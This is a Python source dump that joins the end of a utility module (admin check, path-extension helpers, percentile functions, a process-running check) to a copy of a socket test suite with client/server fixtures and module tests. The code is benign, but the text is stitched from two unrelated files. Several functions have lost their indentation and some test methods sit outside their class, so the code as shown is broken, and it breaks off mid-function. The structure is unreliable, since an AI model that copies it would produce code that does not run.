        from win32com.shell.shell import IsUserAnAdmin  # pylint:disable=import-outside-toplevel

        return IsUserAnAdmin()
    else:
        # Importing it this way since geteuid doesn't exist in windows and mypy complains there
        geteuid = cast(Callable[[], int], getattr(os, "geteuid"))
        # Effective UID 0 means root.
        return geteuid() == 0
def get_extension(path: Path) -> str:
    """Return the last extension of *path*, including the leading dot ('' if none)."""
    _, ext = splitext(path.name)
    return ext

def add_extension(p: Path, ext: str) -> Path:
    """Append `.ext` to the file name of *p*."""
    new_name = f"{p.name}.{ext}"
    return p.parent / new_name

def remove_extension(p: Path) -> Path:
    """Strip the last extension from the file name of *p*."""
    stem, _ = splitext(p.name)
    return p.parent / stem

def change_extension(p: Path, ext: str) -> Path:
    """Replace the last extension of *p* with *ext*."""
    return add_extension(remove_extension(p), ext)
def get_or_did_you_mean(mapping: Mapping[str, V], key: str, name: str) -> V:
    """Look up *key* in *mapping*, raising a 'did you mean' Exception when absent."""
    if key in mapping:
        return mapping[key]
    raise Exception(did_you_mean(tuple(mapping.keys()), key, name)) from None
def did_you_mean(
    choices: Iterable[str], choice: str, name: str, show_choice: Callable[[str], str] = identity
) -> str:
    """Build a 'Bad <name> <choice>' message, suggesting close matches."""
    assert choice not in choices
    # Mypy has the return type of get_close_matches wrong?
    close = check_cast(Sequence[str], get_close_matches(choice, choices))  # type: ignore
    prefix = f"Bad {name} {show_choice(choice)}."
    if is_empty(close):
        choices = tuple(choices)
        if len(choices) < 20:
            return f"{prefix} Available: {tuple(choices)}"
        return prefix
    if len(close) == 1:
        return f"{prefix} Did you mean {show_choice(close[0])}?"
    close_str = "\n".join(tuple(show_choice(c) for c in close))
    return f"{prefix} Did you mean one of:\n{close_str}"
def hex_no_0x(i: int) -> str:
    """Return hex(i) without the '0x' prefix.

    NOTE(review): for negative *i*, ``hex()`` yields '-0x…'; the result then
    depends on `remove_str_start` semantics — confirm if negatives occur.
    """
    return remove_str_start(hex(i), "0x")
def try_parse_single_tag_from_xml_document(path: Path, tag_name: str) -> Optional[str]:
    """Return the text of the single *tag_name* element in the document at
    *path*, or None when the tag is absent."""
    assert tag_name.startswith("{"), "Should start with schema"
    root = parse_xml(str(path)).getroot()
    tags = tuple(_iter_tag_recursive(root, tag_name))
    if is_empty(tags):
        return None
    assert len(tags) == 1  # Should only be specified once
    return tags[0].text
def _iter_tag_recursive(e: Element, tag_name: str) -> Iterable[Element]:
for child in e:
if child.tag == tag_name:
yield child
else:
yield from _iter_tag_recursive(child, tag_name)
# Note: WeakKeyDictionary does not seem to work on CLR types. So using this hack instead.
def lazy_property(obj: T, f: Callable[[T], U], name: Optional[str] = None) -> U:
    """Compute f(obj) once and cache the result as an attribute on *obj*.

    The attribute name defaults to "<source file of f>/<f.__name__>".
    Because None is the "not yet computed" sentinel, *f* must never
    return None.
    """
    if name is None:
        # Mypy expects f to be a "FunctionType", but I don't know how to import that
        name = f"{getfile(cast(Any, f))}/{f.__name__}"
    res: Optional[U] = getattr(obj, name, None)
    if res is None:
        res = f(obj)
        assert res is not None  # None would defeat the caching sentinel above
        setattr(obj, name, res)
    return res
def opt_max(i: Iterable[float]) -> Optional[float]:
    """Return max(i), or None when *i* is empty."""
    # `default=` replaces the try/except ValueError dance around empty input.
    return max(i, default=None)
def opt_median(i: Iterable[float]) -> Optional[float]:
    """Return the median of *i*, or None when *i* is empty."""
    values = list(i)
    if not values:
        return None
    return median(values)
# numpy has problems on ARM, so using this instead.
def get_percentile(values: Sequence[float], percent: float) -> float:
    """Linearly-interpolated percentile of *values* (0.0 <= percent <= 100.0)."""
    assert not is_empty(values)
    assert 0.0 <= percent <= 100.0
    ordered = sorted(values)
    position = (len(ordered) - 1) * (percent / 100.0)
    lo = floor(position)
    hi = ceil(position)
    # The closer the position is to 'hi', the more the upper sample matters.
    upper_weight = position - lo
    lower_weight = 1.0 - upper_weight
    return ordered[lo] * lower_weight + ordered[hi] * upper_weight
def get_95th_percentile(values: Sequence[float]) -> Result[str, float]:
    """Return Ok(95th percentile of *values*), or Err for an empty sequence."""
    return Err("<no values>") if is_empty(values) else Ok(get_percentile(values, 95))
def update_file(path: Path, text: str) -> None:
    """Write *text* to *path*, but only when the content actually changes."""
    unchanged = path.exists() and path.read_text(encoding="utf-8") == text
    if not unchanged:
        print(f"Updating {path}")
        path.write_text(text, encoding="utf-8")
# When we run a test with 'sudo', we need to make sure other users can access the file
def give_user_permissions(file: Path) -> None:
    """chmod *file* so every user (owner, group, other) can read and write it."""
    mode = (
        S_IREAD | S_IWRITE
        | S_IRUSR | S_IWUSR
        | S_IRGRP | S_IWGRP
        | S_IROTH | S_IWOTH
    )
    file.chmod(mode)
def check_no_processes(names: Sequence[str]) -> None:
    """Assert that no running process name contains any of *names*.

    *names* must be lowercase; process names are lowercased before matching.
    """
    assert all(name.islower() for name in names)
    # Hoisted out of the per-process loop: the suggestion text depends only on
    # the OS and the offending name, not on the process being inspected.
    suggestions = {
        name: {
            OS.posix: f"pkill -f {name}",
            OS.windows: f'Get-Process | Where-Object {{$_.Name -like "{name}"}} | Stop-Process',
        }[get_os()]
        for name in names
    }
    for proc in process_iter():
        proc_name = proc.name().lower()
        for name in names:
            assert name not in proc_name, (
                f"'{name}' is already running\n" + f"Try: `{suggestions[name]}`"
            )
def get_command_line() -> str:
    """Render the current process invocation as a copy-pasteable line."""
    joined_args = " ".join(argv)
    return f"> py {joined_args}"
|
test_socket.py | import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
# Overall timeout for the longest-running operations in this test file.
MAIN_TIMEOUT = 60.0
# Fixed port used by the AF_VSOCK tests.
VSOCKPORT = 1234
AIX = platform.system() == "AIX"

# The low-level C module; None when only the pure-Python layer is available.
try:
    import _socket
except ImportError:
    _socket = None
def get_cid():
    """Return the local VSOCK context ID, or None when unavailable."""
    # Both fcntl and the ioctl constant are required for the VSOCK query.
    if fcntl is None or not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
        return None
    try:
        with open("/dev/vsock", "rb") as f:
            raw = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, "    ")
    except OSError:
        return None
    return struct.unpack("I", raw)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
    """Check whether AF_VSOCK sockets are supported on this host."""
    return get_cid() is not None
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
    """Temporarily install *timeout* as the module-wide socket default."""
    saved = socket.getdefaulttimeout()
    try:
        socket.setdefaulttimeout(timeout)
        yield
    finally:
        socket.setdefaulttimeout(saved)
# Probe each optional socket family once at import time; skip decorators
# throughout the file key off these flags.
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
    """Base fixture: a listening TCP server socket bound to a free port."""

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = support.bind_port(self.serv)
        self.serv.listen()

    def tearDown(self):
        self.serv.close()
        self.serv = None
class SocketUDPTest(unittest.TestCase):
    """Base fixture: a UDP server socket bound to a free port."""

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.port = support.bind_port(self.serv)

    def tearDown(self):
        self.serv.close()
        self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
    """Subclass of unittest.TestCase with thread-safe cleanup methods.

    This subclass protects the addCleanup() and doCleanups() methods
    with a recursive lock.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Recursive so a cleanup callback may itself register cleanups.
        self._cleanup_lock = threading.RLock()

    def addCleanup(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().addCleanup(*args, **kwargs)

    def doCleanups(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
    """To be able to run this test, a `vcan0` CAN interface can be created with
    the following commands:
    # modprobe vcan
    # ip link add dev vcan0 type vcan
    # ip link set up vcan0
    """

    interface = 'vcan0'
    bufsize = 128

    """The CAN frame structure is defined in <linux/can.h>:

    struct can_frame {
        canid_t can_id;  /* 32 bit CAN_ID + EFF/RTR/ERR flags */
        __u8    can_dlc; /* data length code: 0 .. 8 */
        __u8    data[8] __attribute__((aligned(8)));
    };
    """
    can_frame_fmt = "=IB3x8s"
    can_frame_size = struct.calcsize(can_frame_fmt)

    """The Broadcast Management Command frame structure is defined
    in <linux/can/bcm.h>:

    struct bcm_msg_head {
        __u32 opcode;
        __u32 flags;
        __u32 count;
        struct timeval ival1, ival2;
        canid_t can_id;
        __u32 nframes;
        struct can_frame frames[0];
    }

    `bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
    `struct can_frame` definition). Must use native not standard types for packing.
    """
    bcm_cmd_msg_fmt = "@3I4l2I"
    # Pad the BCM header format out to an 8-byte boundary (see note above).
    bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)

    def setUp(self):
        self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        self.addCleanup(self.s.close)
        try:
            self.s.bind((self.interface,))
        except OSError:
            # bind() fails when vcan0 has not been configured (see class doc).
            self.skipTest('network interface `%s` does not exist' %
                          self.interface)
class SocketRDSTest(unittest.TestCase):
    """To be able to run this test, the `rds` kernel module must be loaded:
    # modprobe rds
    """

    bufsize = 8192

    def setUp(self):
        self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        self.addCleanup(self.serv.close)
        try:
            self.port = support.bind_port(self.serv)
        except OSError:
            # Binding fails when the rds kernel module is not loaded.
            self.skipTest('unable to bind RDS socket')
class ThreadableTest:
    """Threadable Test class

    The ThreadableTest class makes it easy to create a threaded
    client/server pair from an existing unit test. To create a
    new threaded class from an existing unit test, use multiple
    inheritance:

        class NewClass (OldClass, ThreadableTest):
            pass

    This class defines two new fixture functions with obvious
    purposes for overriding:

        clientSetUp ()
        clientTearDown ()

    Any new test functions within the class must then define
    tests in pairs, where the test name is preceded with a
    '_' to indicate the client portion of the test. Ex:

        def testFoo(self):
            # Server portion

        def _testFoo(self):
            # Client portion

    Any exceptions raised by the clients during their tests
    are caught and transferred to the main thread to alert
    the testing framework.

    Note, the server setup function cannot call any blocking
    functions that rely on the client thread during setup,
    unless serverExplicitReady() is called just before
    the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp().
    """

    def __init__(self):
        # Swap the true setup function
        self.__setUp = self.setUp
        self.__tearDown = self.tearDown
        self.setUp = self._setUp
        self.tearDown = self._tearDown

    def serverExplicitReady(self):
        """This method allows the server to explicitly indicate that
        it wants the client thread to proceed. This is useful if the
        server is about to execute a blocking routine that is
        dependent upon the client thread during its setup routine."""
        self.server_ready.set()

    def _setUp(self):
        self.wait_threads = support.wait_threads_exit()
        self.wait_threads.__enter__()
        # Events coordinating the server (this thread) and the client thread.
        self.server_ready = threading.Event()
        self.client_ready = threading.Event()
        self.done = threading.Event()
        # Size-1 queue transfers at most one client exception to this thread.
        self.queue = queue.Queue(1)
        self.server_crashed = False

        # Do some munging to start the client test.
        methodname = self.id()
        i = methodname.rfind('.')
        methodname = methodname[i+1:]
        test_method = getattr(self, '_' + methodname)
        self.client_thread = thread.start_new_thread(
            self.clientRun, (test_method,))

        try:
            self.__setUp()
        except:
            self.server_crashed = True
            raise
        finally:
            # Release the client thread even if server setup failed.
            self.server_ready.set()
        self.client_ready.wait()

    def _tearDown(self):
        self.__tearDown()
        self.done.wait()
        self.wait_threads.__exit__(None, None, None)

        # Re-raise any exception the client thread queued up.
        if self.queue.qsize():
            exc = self.queue.get()
            raise exc

    def clientRun(self, test_func):
        # Runs on the client thread; mirrors server-side failures via queue.
        self.server_ready.wait()
        try:
            self.clientSetUp()
        except BaseException as e:
            self.queue.put(e)
            self.clientTearDown()
            return
        finally:
            self.client_ready.set()
        if self.server_crashed:
            self.clientTearDown()
            return
        if not hasattr(test_func, '__call__'):
            raise TypeError("test_func must be a callable function")
        try:
            test_func()
        except BaseException as e:
            self.queue.put(e)
        finally:
            self.clientTearDown()

    def clientSetUp(self):
        raise NotImplementedError("clientSetUp must be implemented.")

    def clientTearDown(self):
        self.done.set()
        thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
    """TCP server fixture plus a client socket on a second thread."""

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
    """UDP server fixture plus a client socket on a second thread."""

    def __init__(self, methodName='runTest'):
        SocketUDPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
    """CAN server fixture plus a client CAN socket on a second thread."""

    def __init__(self, methodName='runTest'):
        SocketCANTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        try:
            self.cli.bind((self.interface,))
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
    """RDS server fixture plus a bound client RDS socket on a second thread."""

    def __init__(self, methodName='runTest'):
        SocketRDSTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        try:
            # RDS sockets must be bound explicitly to send or receive data
            self.cli.bind((HOST, 0))
            self.cli_addr = self.cli.getsockname()
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
                     'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
                     "This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
    """Server/client VSOCK stream pair; only runs inside a virtual guest."""

    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.serv.close)
        self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
        self.serv.listen()
        # accept() below blocks on the client, so release it explicitly first.
        self.serverExplicitReady()
        self.conn, self.connaddr = self.serv.accept()
        self.addCleanup(self.conn.close)

    def clientSetUp(self):
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        cid = get_cid()
        self.cli.connect((cid, VSOCKPORT))

    def testStream(self):
        # Server side: the client's MSG must arrive intact.
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)

    def _testStream(self):
        # Client side of testStream.
        self.cli.send(MSG)
        self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
    """Socket tests for client-server connection.

    self.cli_conn is a client socket connected to the server.  The
    setUp() method guarantees that it is connected to the server.
    """

    def __init__(self, methodName='runTest'):
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)

    def setUp(self):
        ThreadedTCPSocketTest.setUp(self)
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn

    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        ThreadedTCPSocketTest.tearDown(self)

    def clientSetUp(self):
        ThreadedTCPSocketTest.clientSetUp(self)
        self.cli.connect((HOST, self.port))
        self.serv_conn = self.cli

    def clientTearDown(self):
        self.serv_conn.close()
        self.serv_conn = None
        ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
    """Fixture built on socketpair(): serv/cli are pre-connected peers."""

    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.serv, self.cli = socket.socketpair()

    def tearDown(self):
        # cli is closed by clientTearDown on the client thread.
        self.serv.close()
        self.serv = None

    def clientSetUp(self):
        pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
    """A base class for socket tests.

    Subclasses must provide methods newSocket() to return a new socket
    and bindSock(sock) to bind it to an unused address.

    Creates a socket self.serv and sets self.serv_addr to its address.
    """

    def setUp(self):
        self.serv = self.newSocket()
        self.bindServer()

    def bindServer(self):
        """Bind server socket and set self.serv_addr to its address."""
        self.bindSock(self.serv)
        self.serv_addr = self.serv.getsockname()

    def tearDown(self):
        self.serv.close()
        self.serv = None
class SocketListeningTestMixin(SocketTestBase):
    """Mixin to listen on the server socket."""

    def setUp(self):
        super().setUp()
        self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
                              ThreadableTest):
    """Mixin to add client socket and allow client/server tests.

    Client socket is self.cli and its address is self.cli_addr.  See
    ThreadableTest for usage information.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = self.newClientSocket()
        self.bindClient()

    def newClientSocket(self):
        """Return a new socket for use as client."""
        return self.newSocket()

    def bindClient(self):
        """Bind client socket and set self.cli_addr to its address."""
        self.bindSock(self.cli)
        self.cli_addr = self.cli.getsockname()

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
                               ThreadedSocketTestMixin):
    """Mixin to allow client/server stream tests with connected client.

    Server's socket representing connection to client is self.cli_conn
    and client's connection to server is self.serv_conn.  (Based on
    SocketConnectedTest.)
    """

    def setUp(self):
        super().setUp()
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn

    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        super().tearDown()

    def clientSetUp(self):
        super().clientSetUp()
        self.cli.connect(self.serv_addr)
        self.serv_conn = self.cli

    def clientTearDown(self):
        try:
            self.serv_conn.close()
            self.serv_conn = None
        except AttributeError:
            # serv_conn was never set when clientSetUp failed early.
            pass
        super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
    """Base class for Unix-domain socket tests."""

    # This class is used for file descriptor passing tests, so we
    # create the sockets in a private directory so that other users
    # can't send anything that might be problematic for a privileged
    # user running the tests.

    def setUp(self):
        self.dir_path = tempfile.mkdtemp()
        self.addCleanup(os.rmdir, self.dir_path)
        super().setUp()

    def bindSock(self, sock):
        path = tempfile.mktemp(dir=self.dir_path)
        support.bind_unix_socket(sock, path)
        self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
    """Base class for Unix-domain SOCK_STREAM tests."""

    def newSocket(self):
        return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
    """Base class for IPv4 socket tests."""

    host = HOST

    def setUp(self):
        super().setUp()
        # Convenience: the port the server socket was bound to.
        self.port = self.serv_addr[1]

    def bindSock(self, sock):
        support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
    """Base class for TCP-over-IPv4 tests."""

    def newSocket(self):
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
    """Base class for UDP-over-IPv4 tests."""

    def newSocket(self):
        return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
    """Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""

    def newSocket(self):
        return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
                             socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
    """Base class for IPv6 socket tests."""

    host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
    """Base class for UDP-over-IPv6 tests."""

    def newSocket(self):
        return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.

def skipWithClientIf(condition, reason):
    """Skip decorated test if condition is true, add client_skip decorator.

    If the decorated object is not a class, sets its attribute
    "client_skip" to a decorator which will return an empty function
    if the test is to be skipped, or the original function if it is
    not.  This can be used to avoid running the client part of a
    skipped test when using ThreadableTest.
    """
    def client_pass(*args, **kwargs):
        # Stand-in used for the client half of a skipped test.
        pass
    def skipdec(obj):
        # Applied when the test IS to be skipped.
        retval = unittest.skip(reason)(obj)
        if not isinstance(obj, type):
            retval.client_skip = lambda f: client_pass
        return retval
    def noskipdec(obj):
        # Applied when the test is NOT skipped: mark the client as runnable.
        if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
            obj.client_skip = lambda f: f
        return obj
    return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
    """Skip decorated test if obj is missing any of the given attributes.

    Sets client_skip attribute as skipWithClientIf() does.
    """
    missing = [name for name in attributes if not hasattr(obj, name)]
    return skipWithClientIf(
        missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
    """Skip decorated test if a socket cannot be created with given arguments.

    When an argument is given as a string, will use the value of that
    attribute of the socket module, or skip the test if it doesn't
    exist.  Sets client_skip attribute as skipWithClientIf() does.
    """
    err = None
    # String args that do not name a socket-module attribute → skip outright.
    missing = [obj for obj in args if
               isinstance(obj, str) and not hasattr(socket, obj)]
    if missing:
        err = "don't have " + ", ".join(name for name in missing)
    else:
        callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
                    for obj in args]
        try:
            s = socket.socket(*callargs)
        except OSError as e:
            # XXX: check errno?
            err = str(e)
        else:
            s.close()
    return skipWithClientIf(
        err is not None,
        "can't create socket({0}): {1}".format(
            ", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
    def test_SocketType_is_socketobject(self):
        # socket.SocketType must be the C-level socket type itself.
        import _socket
        self.assertTrue(socket.SocketType is _socket.socket)
        s = socket.socket()
        self.assertIsInstance(s, socket.SocketType)
        s.close()
    def test_repr(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        with s:
            self.assertIn('fd=%i' % s.fileno(), repr(s))
            self.assertIn('family=%s' % socket.AF_INET, repr(s))
            self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
            self.assertIn('proto=0', repr(s))
            # No remote address before a connection is made.
            self.assertNotIn('raddr', repr(s))
            s.bind(('127.0.0.1', 0))
            self.assertIn('laddr', repr(s))
            self.assertIn(str(s.getsockname()), repr(s))
        # Leaving the `with` block closed the socket; repr must say so.
        self.assertIn('[closed]', repr(s))
        self.assertNotIn('laddr', repr(s))
    @unittest.skipUnless(_socket is not None, 'need _socket module')
    def test_csocket_repr(self):
        # The C socket type has its own (non-__repr__-overridden) format.
        s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
        try:
            expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
                        % (s.fileno(), s.family, s.type, s.proto))
            self.assertEqual(repr(s), expected)
        finally:
            s.close()
        # After close() the fd in the repr becomes -1.
        expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
                    % (s.family, s.type, s.proto))
        self.assertEqual(repr(s), expected)
    def test_weakref(self):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            p = proxy(s)
            self.assertEqual(p.fileno(), s.fileno())
        # Drop the last strong reference so the proxy's target can be collected.
        s = None
        try:
            p.fileno()
        except ReferenceError:
            pass
        else:
            self.fail('Socket proxy still exists')
    def testSocketError(self):
        # Testing socket module exceptions
        # herror and gaierror must both be subclasses of OSError.
        msg = "Error raising socket exception (%s)."
        with self.assertRaises(OSError, msg=msg % 'OSError'):
            raise OSError
        with self.assertRaises(OSError, msg=msg % 'socket.herror'):
            raise socket.herror
        with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
            raise socket.gaierror
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def testSendtoErrors(self):
        # Testing that sendto doesn't mask failures. See #10169.
        # Each bad call must raise TypeError with a precise message.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        s.bind(('', 0))
        sockname = s.getsockname()
        # 2 args
        with self.assertRaises(TypeError) as cm:
            s.sendto('\u2620', sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'str'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(5j, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'complex'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', None)
        self.assertIn('not NoneType',str(cm.exception))
        # 3 args
        with self.assertRaises(TypeError) as cm:
            s.sendto('\u2620', 0, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'str'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(5j, 0, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'complex'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 0, None)
        self.assertIn('not NoneType', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 'bar', sockname)
        self.assertIn('an integer is required', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', None, None)
        self.assertIn('an integer is required', str(cm.exception))
        # wrong number of args
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo')
        self.assertIn('(1 given)', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 0, sockname, 4)
        self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
    """The essential AF_/SOCK_/SOL_/SO_ constants must be present."""
    socket.AF_INET
    if socket.has_ipv6:
        socket.AF_INET6
    # Accessing a missing attribute raises, failing the test.
    for const_name in ('SOCK_STREAM', 'SOCK_DGRAM', 'SOCK_RAW',
                       'SOCK_RDM', 'SOCK_SEQPACKET',
                       'SOL_SOCKET', 'SO_REUSEADDR'):
        getattr(socket, const_name)
def testCrucialIpProtoConstants(self):
    """IPPROTO_TCP/UDP (and IPPROTO_IPV6 when IPv6 exists) must be present."""
    for const_name in ('IPPROTO_TCP', 'IPPROTO_UDP'):
        getattr(socket, const_name)
    if socket.has_ipv6:
        socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
    """Windows-only IPPROTO_* constants must be exposed."""
    for const_name in ('IPPROTO_ICLFXBM', 'IPPROTO_ST', 'IPPROTO_CBT',
                       'IPPROTO_IGP', 'IPPROTO_RDP', 'IPPROTO_PGM',
                       'IPPROTO_L2TP', 'IPPROTO_SCTP'):
        getattr(socket, const_name)
def testHostnameRes(self):
    """gethostname/gethostbyname/gethostbyaddr/getfqdn must be mutually consistent."""
    # Testing hostname resolution mechanisms
    hostname = socket.gethostname()
    try:
        ip = socket.gethostbyname(hostname)
    except OSError:
        # Probably name lookup wasn't set up right; skip this test
        self.skipTest('name lookup failure')
    self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
    try:
